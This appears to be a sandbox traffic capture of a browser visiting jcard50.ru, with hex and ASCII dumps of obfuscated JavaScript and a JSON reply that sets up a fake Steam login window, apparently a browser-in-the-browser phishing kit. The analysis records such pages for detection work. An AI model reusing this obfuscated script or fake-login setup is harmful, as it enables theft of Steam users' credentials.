                2025-01-13 00:00:43 UTC1369INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 35 64 39 64 35 2c 5f 30 78 31 66 38 65 31 32 29 7b 5f 30 78 35 35 64 39 64 35 3d 5f 30 78 35 35 64 39 64 35 2d 30 78 31 34 61 3b 6c 65 74 20 5f 30 78 31 34 38 35 39 65 3d 5f 30 78 33 65 63 32 37 34 5b 5f 30 78 35 35 64 39 64 35 5d 3b 72 65 74 75 72 6e 20 5f 30 78 31 34 38 35 39 65 3b 7d 2c 5f 30 78 35 35 64 39 28 5f 30 78 31 33 39 39 38 64 2c 5f 30 78 36 63 65 38 32 66 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 30 64 35 30 65 2c 5f 30 78 35 32 34 35 34 66 29 7b 63 6f 6e 73 74 20 5f 30 78 34 33 32 36 65 66 3d 5f 30 78 35 35 64 39 2c 5f 30 78 34 37 63 31 34 39 3d 5f 30 78 35 30 64 35 30 65 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 32 37 34 63 36 3d 70 61 72 73 65
                Data Ascii: =function(_0x55d9d5,_0x1f8e12){_0x55d9d5=_0x55d9d5-0x14a;let _0x14859e=_0x3ec274[_0x55d9d5];return _0x14859e;},_0x55d9(_0x13998d,_0x6ce82f);}(function(_0x50d50e,_0x52454f){const _0x4326ef=_0x55d9,_0x47c149=_0x50d50e();while(!![]){try{const _0x4274c6=parse
                2025-01-13 00:00:43 UTC1369INData Raw: 39 36 39 65 39 29 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 31 61 61 34 63 31 3d 5f 30 78 32 32 62 36 66 35 3b 66 6f 72 28 76 61 72 20 5f 30 78 34 35 32 66 31 31 20 69 6e 20 5f 30 78 37 39 36 39 65 39 7c 7c 28 5f 30 78 37 39 36 39 65 39 3d 7b 7d 29 29 5f 30 78 32 62 64 34 37 38 5b 27 63 61 6c 6c 27 5d 28 5f 30 78 37 39 36 39 65 39 2c 5f 30 78 34 35 32 66 31 31 29 26 26 5f 30 78 34 39 65 66 63 38 28 5f 30 78 34 31 31 38 39 66 2c 5f 30 78 34 35 32 66 31 31 2c 5f 30 78 37 39 36 39 65 39 5b 5f 30 78 34 35 32 66 31 31 5d 29 3b 69 66 28 5f 30 78 35 38 63 32 66 31 29 7b 66 6f 72 28 76 61 72 20 5f 30 78 34 35 32 66 31 31 20 6f 66 20 5f 30 78 35 38 63 32 66 31 28 5f 30 78 37 39 36 39 65 39 29 29 5f 30 78 32 30 65 32 65 36 5b 5f 30 78 31 61 61 34 63 31 28 30 78 31 37 36
                Data Ascii: 969e9)=>{const _0x1aa4c1=_0x22b6f5;for(var _0x452f11 in _0x7969e9||(_0x7969e9={}))_0x2bd478['call'](_0x7969e9,_0x452f11)&&_0x49efc8(_0x41189f,_0x452f11,_0x7969e9[_0x452f11]);if(_0x58c2f1){for(var _0x452f11 of _0x58c2f1(_0x7969e9))_0x20e2e6[_0x1aa4c1(0x176
                2025-01-13 00:00:43 UTC1369INData Raw: 36 32 28 30 78 31 61 36 29 5d 3d 5f 30 78 34 32 32 33 31 33 28 29 3a 5f 30 78 31 30 37 63 30 36 5b 27 67 65 74 53 69 7a 65 27 5d 3d 5f 30 78 34 32 32 33 31 33 28 29 3b 7d 28 77 69 6e 64 6f 77 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 31 64 61 33 3d 5f 30 78 35 35 64 39 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 63 63 39 39 28 5f 30 78 61 62 30 34 39 37 29 7b 63 6f 6e 73 74 20 5f 30 78 35 64 32 64 62 61 3d 5f 30 78 35 35 64 39 3b 6c 65 74 20 5f 30 78 32 33 62 61 65 38 3d 70 61 72 73 65 46 6c 6f 61 74 28 5f 30 78 61 62 30 34 39 37 29 3b 72 65 74 75 72 6e 20 5f 30 78 61 62 30 34 39 37 5b 5f 30 78 35 64 32 64 62 61 28 30 78 32 37 33 29 5d 28 27 25 27 29 3d 3d 2d 30 78 31 26 26 21 69 73 4e 61 4e 28 5f 30 78 32 33 62 61 65 38 29 26
                Data Ascii: 62(0x1a6)]=_0x422313():_0x107c06['getSize']=_0x422313();}(window,function(){const _0x3a1da3=_0x55d9;function _0x19cc99(_0xab0497){const _0x5d2dba=_0x55d9;let _0x23bae8=parseFloat(_0xab0497);return _0xab0497[_0x5d2dba(0x273)]('%')==-0x1&&!isNaN(_0x23bae8)&
                2025-01-13 00:00:43 UTC1369INData Raw: 74 28 5f 30 78 35 63 33 63 63 66 29 3b 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 34 63 32 63 33 37 5d 3d 69 73 4e 61 4e 28 5f 30 78 33 34 33 64 66 39 29 3f 30 78 30 3a 5f 30 78 33 34 33 64 66 39 3b 7d 29 3b 6c 65 74 20 5f 30 78 34 32 37 66 66 32 3d 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 66 32 63 66 32 31 28 30 78 31 61 61 29 5d 2b 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 66 32 63 66 32 31 28 30 78 32 32 33 29 5d 2c 5f 30 78 32 38 31 36 37 66 3d 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 66 32 63 66 32 31 28 30 78 31 64 37 29 5d 2b 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 66 32 63 66 32 31 28 30 78 31 36 32 29 5d 2c 5f 30 78 35 62 64 36 37 39 3d 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 66 32 63 66 32 31 28 30 78 32 32 31 29 5d 2b 5f 30 78 61 66 32 32 66 62 5b 5f 30 78
                Data Ascii: t(_0x5c3ccf);_0xaf22fb[_0x4c2c37]=isNaN(_0x343df9)?0x0:_0x343df9;});let _0x427ff2=_0xaf22fb[_0xf2cf21(0x1aa)]+_0xaf22fb[_0xf2cf21(0x223)],_0x28167f=_0xaf22fb[_0xf2cf21(0x1d7)]+_0xaf22fb[_0xf2cf21(0x162)],_0x5bd679=_0xaf22fb[_0xf2cf21(0x221)]+_0xaf22fb[_0x
                2025-01-13 00:00:43 UTC1369INData Raw: 6e 63 74 69 6f 6e 20 5f 30 78 36 66 61 62 38 30 28 29 7b 7d 6c 65 74 20 5f 30 78 34 35 39 34 35 66 3d 5f 30 78 36 66 61 62 38 30 5b 5f 30 78 31 36 62 33 62 39 28 30 78 31 37 62 29 5d 3b 72 65 74 75 72 6e 20 5f 30 78 34 35 39 34 35 66 5b 27 6f 6e 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 65 64 38 34 32 63 2c 5f 30 78 35 30 31 32 38 33 29 7b 63 6f 6e 73 74 20 5f 30 78 34 31 64 38 30 61 3d 5f 30 78 31 36 62 33 62 39 3b 69 66 28 21 5f 30 78 65 64 38 34 32 63 7c 7c 21 5f 30 78 35 30 31 32 38 33 29 72 65 74 75 72 6e 20 74 68 69 73 3b 6c 65 74 20 5f 30 78 33 65 61 61 63 30 3d 74 68 69 73 5b 5f 30 78 34 31 64 38 30 61 28 30 78 31 39 61 29 5d 3d 74 68 69 73 5b 27 5f 65 76 65 6e 74 73 27 5d 7c 7c 7b 7d 2c 5f 30 78 34 66 35 66 32 65 3d 5f 30 78 33 65 61 61 63 30
                Data Ascii: nction _0x6fab80(){}let _0x45945f=_0x6fab80[_0x16b3b9(0x17b)];return _0x45945f['on']=function(_0xed842c,_0x501283){const _0x41d80a=_0x16b3b9;if(!_0xed842c||!_0x501283)return this;let _0x3eaac0=this[_0x41d80a(0x19a)]=this['_events']||{},_0x4f5f2e=_0x3eaac0
                2025-01-13 00:00:43 UTC1369INData Raw: 33 20 6f 66 20 5f 30 78 63 65 36 34 62 31 29 5f 30 78 34 39 36 34 34 39 26 26 5f 30 78 34 39 36 34 34 39 5b 5f 30 78 33 33 35 66 38 33 5d 26 26 28 74 68 69 73 5b 5f 30 78 33 65 36 35 39 31 28 30 78 31 62 33 29 5d 28 5f 30 78 33 30 64 62 31 33 2c 5f 30 78 33 33 35 66 38 33 29 2c 64 65 6c 65 74 65 20 5f 30 78 34 39 36 34 34 39 5b 5f 30 78 33 33 35 66 38 33 5d 29 2c 5f 30 78 33 33 35 66 38 33 5b 5f 30 78 33 65 36 35 39 31 28 30 78 31 39 31 29 5d 28 74 68 69 73 2c 5f 30 78 39 38 64 32 36 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 3b 7d 2c 5f 30 78 34 35 39 34 35 66 5b 5f 30 78 31 36 62 33 62 39 28 30 78 32 32 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 34 33 61 66 33 62 3d 5f 30 78 31 36 62 33 62 39 3b 72 65 74 75 72 6e 20 64 65 6c
                Data Ascii: 3 of _0xce64b1)_0x496449&&_0x496449[_0x335f83]&&(this[_0x3e6591(0x1b3)](_0x30db13,_0x335f83),delete _0x496449[_0x335f83]),_0x335f83[_0x3e6591(0x191)](this,_0x98d26e);return this;},_0x45945f[_0x16b3b9(0x226)]=function(){const _0x43af3b=_0x16b3b9;return del
                2025-01-13 00:00:43 UTC1369INData Raw: 5f 30 78 34 65 65 65 62 62 5b 27 62 69 6e 64 48 61 6e 64 6c 65 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 31 37 36 38 61 38 3d 5f 30 78 35 38 34 32 62 32 3b 74 68 69 73 5b 5f 30 78 31 37 36 38 61 38 28 30 78 32 33 37 29 5d 28 5f 30 78 31 37 36 38 61 38 28 30 78 31 37 31 29 2c 74 68 69 73 5b 5f 30 78 31 37 36 38 61 38 28 30 78 31 38 30 29 5d 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 5f 30 78 35 38 34 32 62 32 28 30 78 32 35 62 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 64 34 37 30 62 38 3d 5f 30 78 35 38 34 32 62 32 3b 74 68 69 73 5b 5f 30 78 64 34 37 30 62 38 28 30 78 32 33 37 29 5d 28 27 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 27 2c 27 27 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 5f
                Data Ascii: _0x4eeebb['bindHandles']=function(){const _0x1768a8=_0x5842b2;this[_0x1768a8(0x237)](_0x1768a8(0x171),this[_0x1768a8(0x180)]);},_0x4eeebb[_0x5842b2(0x25b)]=function(){const _0xd470b8=_0x5842b2;this[_0xd470b8(0x237)]('removeEventListener','');},_0x4eeebb[_
                2025-01-13 00:00:43 UTC1369INData Raw: 63 2c 5f 30 78 31 30 31 32 32 30 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 5f 30 78 35 38 34 32 62 32 28 30 78 32 35 63 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 31 63 62 39 37 29 7b 74 68 69 73 5b 27 70 6f 69 6e 74 65 72 44 6f 77 6e 27 5d 28 5f 30 78 32 31 63 62 39 37 2c 5f 30 78 32 31 63 62 39 37 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 5f 30 78 35 38 34 32 62 32 28 30 78 31 65 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 30 64 33 66 65 29 7b 63 6f 6e 73 74 20 5f 30 78 35 65 32 65 32 37 3d 5f 30 78 35 38 34 32 62 32 3b 74 68 69 73 5b 27 70 6f 69 6e 74 65 72 44 6f 77 6e 27 5d 28 5f 30 78 32 30 64 33 66 65 2c 5f 30 78 32 30 64 33 66 65 5b 5f 30 78 35 65 32 65 32 37 28 30 78 31 38 36 29 5d 5b 30 78 30 5d 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62
                Data Ascii: c,_0x101220);},_0x4eeebb[_0x5842b2(0x25c)]=function(_0x21cb97){this['pointerDown'](_0x21cb97,_0x21cb97);},_0x4eeebb[_0x5842b2(0x1e8)]=function(_0x20d3fe){const _0x5e2e27=_0x5842b2;this['pointerDown'](_0x20d3fe,_0x20d3fe[_0x5e2e27(0x186)][0x0]);},_0x4eeebb
                2025-01-13 00:00:43 UTC1369INData Raw: 78 33 31 64 35 62 33 28 30 78 31 38 38 29 2c 5f 30 78 33 32 32 61 65 38 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 5f 30 78 35 38 34 32 62 32 28 30 78 31 39 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 62 35 65 38 35 29 7b 63 6f 6e 73 74 20 5f 30 78 33 38 31 61 36 63 3d 5f 30 78 35 38 34 32 62 32 3b 74 68 69 73 5b 5f 30 78 33 38 31 61 36 63 28 30 78 32 31 33 29 5d 28 27 70 6f 69 6e 74 65 72 4d 6f 76 65 27 2c 5f 30 78 31 62 35 65 38 35 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 27 70 6f 69 6e 74 65 72 4d 6f 76 65 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 32 63 61 66 32 2c 5f 30 78 34 36 34 35 66 36 29 7b 63 6f 6e 73 74 20 5f 30 78 32 35 61 37 32 63 3d 5f 30 78 35 38 34 32 62 32 3b 6c 65 74 20 5f 30 78 34 35 30 32 34 30 3d 7b 27 78 27 3a 5f 30 78
                Data Ascii: x31d5b3(0x188),_0x322ae8);},_0x4eeebb[_0x5842b2(0x197)]=function(_0x1b5e85){const _0x381a6c=_0x5842b2;this[_0x381a6c(0x213)]('pointerMove',_0x1b5e85);},_0x4eeebb['pointerMove']=function(_0x32caf2,_0x4645f6){const _0x25a72c=_0x5842b2;let _0x450240={'x':_0x


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.549727104.21.32.1443748C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-13 00:00:44 UTC1033OUTGET /704a2a507555060106436b0b12527a5d0a570803 HTTP/1.1
                Host: jcard50.ru
                Connection: keep-alive
                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                sec-ch-ua-mobile: ?0
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                sec-ch-ua-platform: "Windows"
                Accept: */*
                Sec-Fetch-Site: same-origin
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: empty
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
                2025-01-13 00:00:44 UTC1243INHTTP/1.1 200 OK
                Date: Mon, 13 Jan 2025 00:00:44 GMT
                Content-Type: application/json; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Resource-Policy: same-origin
                Etag: W/"120-MqPm4XHM/nkls0IxsfbwoOT3rRg"
                Origin-Agent-Cluster: ?1
                Referrer-Policy: no-referrer
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                X-Dns-Prefetch-Control: off
                X-Download-Options: noopen
                X-Frame-Options: SAMEORIGIN
                X-Permitted-Cross-Domain-Policies: none
                X-Xss-Protection: 0
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TbUJYOCHgoAV00flNxzf%2BiW9UQzkzlGITeyjA7%2FqgknZ6uS%2FwAQiFr6tTSI%2BvCzJqxW0XjiJc7%2BCS43CgDjOqdpb92SU5W%2Fh1Bi2oqywG4sfkWG2Br%2Fj044yiF6q"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 90111b9448b74344-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1653&rtt_var=634&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1611&delivery_rate=1706604&cwnd=47&unsent_bytes=0&cid=9df509e6ec2cdfa7&ts=357&x=0"
                2025-01-13 00:00:44 UTC126INData Raw: 31 32 30 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 73 65 72 76 69 63 65 22 3a 22 53 74 65 61 6d 22 2c 22 69 66 72 61 6d 65 22 3a 74 72 75 65 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 36 37 32 36 34 34 34 33 35 38 2e 33 34 33 35 2c 22 77 69 6e 64 6f 77 22 3a 7b 22 74 79 70 65 22 3a 22 46 61 6b 65 57 69 6e 64 6f 77 22 2c 22 74 69 74 6c 65 22 3a 22 53 74 65
                Data Ascii: 120{"success":true,"service":"Steam","iframe":true,"timestamp":1736726444358.3435,"window":{"type":"FakeWindow","title":"Ste
                2025-01-13 00:00:44 UTC169INData Raw: 61 6d 22 2c 22 75 72 6c 22 3a 22 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 22 2c 22 70 61 74 68 22 3a 22 2f 6c 6f 67 69 6e 2f 68 6f 6d 65 2f 3f 67 6f 74 6f 3d 22 2c 22 69 63 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 7d 2c 22 6c 6f 67 69 6e 22 3a 7b 7d 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 73 44 65 73 6b 74 6f 70 22 3a 74 72 75 65 2c 22 69 73 49 6e 74 65 72 6e 61 6c 22 3a 66 61 6c 73 65 7d 7d 0d 0a
                Data Ascii: am","url":"steamcommunity.com","path":"/login/home/?goto=","icon":"https://steamcommunity.com/favicon.ico"},"login":{},"browser":{"isDesktop":true,"isInternal":false}}
                2025-01-13 00:00:44 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.549728104.21.32.1443748C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-13 00:00:44 UTC1116OUTGET /704a2a50755506000c594c1143057f6111412c207d07.woff2 HTTP/1.1
                Host: jcard50.ru
                Connection: keep-alive
                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                Origin: https://jcard50.ru
                sec-ch-ua-mobile: ?0
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                sec-ch-ua-platform: "Windows"
                Accept: */*
                Sec-Fetch-Site: same-origin
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: font
                Referer: https://jcard50.ru/704a2a5075550603
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
                2025-01-13 00:00:44 UTC1276INHTTP/1.1 200 OK
                Date: Mon, 13 Jan 2025 00:00:44 GMT
                Content-Type: font/woff2
                Transfer-Encoding: chunked
                Connection: close
                Content-Disposition: inline
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Resource-Policy: same-origin
                Last-Modified: Fri, 10 Jan 2025 14:35:20 GMT
                Origin-Agent-Cluster: ?1
                Referrer-Policy: no-referrer
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                X-Dns-Prefetch-Control: off
                X-Download-Options: noopen
                X-Frame-Options: SAMEORIGIN
                X-Permitted-Cross-Domain-Policies: none
                X-Xss-Protection: 0
                Cache-Control: max-age=14400
                CF-Cache-Status: MISS
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpa3wUiLwrJ2qm1IbK4QZolyFuwfwsm8YDIS8MACzS6gF38R4cdU7O9wKCFKYs8q%2F8cOD%2BnCWog%2FqNfUyx0VsP0fk9esCwDvCkJGmc2XMaf3SAEnEX7kd0%2F99yF7"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 90111b947f92c327-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1658&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1694&delivery_rate=1761158&cwnd=189&unsent_bytes=0&cid=13247e24a2006842&ts=477&x=0"
                2025-01-13 00:00:44 UTC93INData Raw: 37 31 62 30 0d 0a 77 4f 46 32 00 01 00 00 00 00 71 b0 00 0f 00 00 00 00 eb 78 00 00 71 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 60 16 8b 60 00 8d 1c 08 2a 09 82 59 11 0c 0a 83 91 6c 82 d2 65 01 36 02 24 03 87 22 0b 84 18 00 04 20 05 97 73 07
                Data Ascii: 71b0wOF2qxqT``*Yle6$" s
                2025-01-13 00:00:44 UTC1369INData Raw: 20 0c 81 53 1b d1 c8 87 82 80 8d 03 00 40 dd 3c 44 14 f5 e1 11 c9 49 ab 07 e0 ff ff 43 42 b8 a9 6a c0 1f 7e fa e5 b7 3f fe fa e7 3f ff fb 47 e8 f0 39 6f 08 40 ae dd 1b 41 fc 44 7e 82 3e e8 83 c6 a9 b9 69 a8 2d 5f 88 d3 7f fb 06 4e d0 89 f2 71 24 8b 24 ad 27 5a ec dd db 56 15 92 d9 53 b7 2f 51 b7 5c 1f 50 55 78 9e b7 fb 3c f7 c3 1b 69 82 37 5f d8 ad 02 2f 80 79 11 31 41 9d a2 f6 4b 5c 92 4d 93 1a ac 92 3d 5e b7 af e4 bf c9 d3 c9 4b 08 83 07 f8 92 35 73 f0 dd 13 13 b2 da 42 d1 9c b8 94 57 b4 48 51 5d 53 ff ff 7b 97 f6 ff 55 a2 ee ae 12 34 b9 1d 38 87 13 87 0e 70 86 0e b3 c0 01 74 77 3b 04 76 22 d5 fe 91 7e a5 75 ff ba 4d c1 49 4c 14 b0 13 73 10 26 b1 20 93 f9 a1 fb de fb 04 fc 79 5e 37 ff 64 12 41 99 ca 08 2b 04 02 61 8d 20 3b 8f 6c 02 81 24 24 40 c2 0a 12
                Data Ascii: S@<DICBj~??G9o@AD~>i-_Nq$$'ZVS/Q\PUx<i7_/y1AK\M=^K5sBWHQ]S{U48ptw;v"~uMILs& y^7dA+a ;l$$@
                2025-01-13 00:00:44 UTC1369INData Raw: 3b f5 a4 11 34 96 a6 d0 0c 9a 4d f3 68 01 2d a1 15 b4 81 76 d2 2e da 47 87 e8 28 9d a0 d3 74 9e ae d0 0d ba 4b 0f e9 29 bd a4 b7 f4 8d fe 93 13 f9 52 08 85 53 0c 25 12 93 89 6a a9 9e 1a a9 95 bb 71 7f 1e c6 63 78 12 4f e3 19 bc 92 d7 f2 06 be c6 df f8 1f 5b b2 35 db b3 23 bb b0 1f 07 73 28 47 72 02 a7 70 16 e7 b3 86 8d 5c cb 2d dc 2e 9d a4 8b f4 94 fe 32 46 26 c9 3c 59 20 8b 65 a5 6c 94 6d b2 57 0e ca 31 39 21 e7 e4 b2 5c 97 db f2 49 7e c8 6f c9 d2 0c d5 e4 81 5d d5 5c 33 5c cb 5d 1b 5d df 95 97 1a a1 a6 ab 1d ea a0 3a a3 ee a8 7b ea 95 fa a4 d2 75 1e 5d 44 d7 d0 75 74 7d dd 56 0f d2 93 f4 14 3d 5f 2f d2 6b f4 5e 7d 48 67 19 77 13 62 84 b1 4c 25 53 dd b4 32 3d 4d 3f 33 d7 2c 37 bb cc 3d f3 3b d2 8e ac 13 d9 39 b2 77 e4 b0 a8 02 51 5d a3 e6 47 1d 8c 3a 16
                Data Ascii: ;4Mh-v.G(tK)RS%jqcxO[5#s(Grp\-.2F&<Y elmW19!\I~o]\3\]]:{u]Dut}V=_/k^}HgwbL%S2=M?3,7=;9wQ]G:
                2025-01-13 00:00:44 UTC1369INData Raw: 52 c0 60 3f c9 71 61 09 5e 09 7c 50 4b e7 23 2b 39 63 70 13 70 5e 0d a0 0c 3a aa 1b 1e ad a4 88 c7 06 03 8b 81 31 46 32 be fa f9 4b 72 67 0b b1 6b a5 50 3d 09 71 f7 7a ca e6 34 ab c7 2f f9 0d ea ae 2f 8f 97 06 5f 41 c0 0f 47 20 41 5e a2 6d eb d8 63 44 14 70 11 9e 22 4a 48 4a 22 e4 f3 d0 f4 ec 05 20 fd 38 86 ed 89 10 61 eb 56 7a ee b0 99 55 59 c6 c2 3c a1 04 01 5c 81 7d d4 e2 46 f9 59 a9 c2 03 f0 d7 01 a2 c7 f8 7a 71 7e 1e 22 51 aa d9 ba 92 cc a6 24 00 58 5c 44 d8 ac 75 19 c2 aa ab c2 f9 2a 12 55 52 4a d5 b1 68 ad 10 2b 6a 0f 93 00 64 bc 1b f3 c0 18 30 86 95 0a 28 d8 a8 b0 d6 84 50 75 b9 59 ca 85 ed 5b 0a 85 90 ec f4 53 9b 89 8e 2a c6 39 40 01 b8 64 eb d9 52 8d 8a 1d e8 9a f8 b8 86 50 94 81 21 38 c2 13 e6 74 6c f8 72 ce de 98 08 61 d4 3c 8a 6d 2d f2 38 ce
                Data Ascii: R`?qa^|PK#+9cpp^:1F2KrgkP=qz4//_AG A^mcDp"JHJ" 8aVzUY<\}FYzq~"Q$X\Du*URJh+jd0(PuY[S*9@dRP!8tlra<m-8
                2025-01-13 00:00:44 UTC1369INData Raw: 47 91 bb a1 7d 88 06 73 4b 77 5f 26 db b5 58 f9 e7 23 d8 bb 7a e7 f5 eb c5 d2 30 f1 6f ce df 7a a6 66 73 e3 a9 61 35 a9 bb 2f fb 75 73 36 76 2c be 7e fd e2 09 f1 d7 cf 3b d6 91 a2 08 90 42 e2 aa 65 4a 28 b6 48 09 d5 cc 54 72 0c 5f 7b 54 2a 0f b2 69 09 d5 78 5e 3c 91 57 38 13 51 6c 9e 8f be 1f 17 50 33 ca e2 0c 20 66 e3 43 7b e4 49 ff 11 99 17 62 55 f7 4a a6 dd aa 86 23 ee 02 d5 82 25 9c f1 16 89 ea cf 23 87 bb 45 0f 82 14 a4 62 05 0b 70 60 9e 72 12 ef 2d 0f 28 1b c7 66 18 ea 72 14 19 61 a8 b7 a2 63 70 22 b7 6b 47 73 0e 65 b9 1c 98 60 9b 71 e4 ee 31 0b 98 a3 33 30 6c 80 34 cb 28 bc 57 1d 89 cb e6 78 df 7c 88 c3 24 c8 c4 34 43 24 ba 7d 88 5a 6f b1 38 2c b5 36 e2 5d 8d 1a 54 18 da 46 c8 e4 49 45 91 91 ec 16 60 3e fe dc e4 d6 4e 0f 3f 05 e7 84 38 1b cb d9 71
                Data Ascii: G}sKw_&X#z0ozfsa5/us6v,~;BeJ(HTr_{T*ix^<W8QlP3 fC{IbUJ#%#Ebp`r-(fracp"kGse`q130l4(Wx|$4C$}Zo8,6]TFIE`>N?8q
